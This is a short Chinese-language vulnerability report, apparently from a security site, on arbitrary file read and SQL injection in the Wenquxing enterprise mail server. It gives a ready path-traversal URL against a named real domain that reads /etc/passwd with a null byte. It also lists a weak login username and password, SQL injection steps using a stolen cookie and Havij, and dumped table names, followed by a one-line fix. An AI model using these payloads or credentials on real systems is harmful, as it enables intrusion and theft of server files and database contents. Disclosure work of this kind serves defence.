文曲星企业邮箱任意文件读取&SQL注入 - 网站安

文曲星企业邮箱服务器存在任意文件读取 漏洞 和SQL注入漏洞，可以读取/目录下任意文件（包括服务器配置、系统用户、网页 源码 等），并可读写所有 数据库

读取任意文件：（以/etc/passwd为例）  

http://mail.ggv.com.cn/login.php?Lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.php

SQL注入： 1.使用弱密码登录  

USERNAME: hansin PASSWORD: hansin@12

2.提取登录cookie(用havij或类似工具) 3.使用前一步获得的cookie注入：http://mail.ggv.com.cn/messageshow.php?id=3

http://mail.ggv.com.cn/login.php?Lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.php

 

Current database [4 tables] +----------+ | address | | logs | | message | | personal | +----------+

 

修复方案：

限制服务器运行用户的权限 修改涉及$_GET[]的页面，修补SQL注射漏洞

查看更多关于文曲星企业邮箱任意文件读取&SQL注入 - 网站安的详细内容...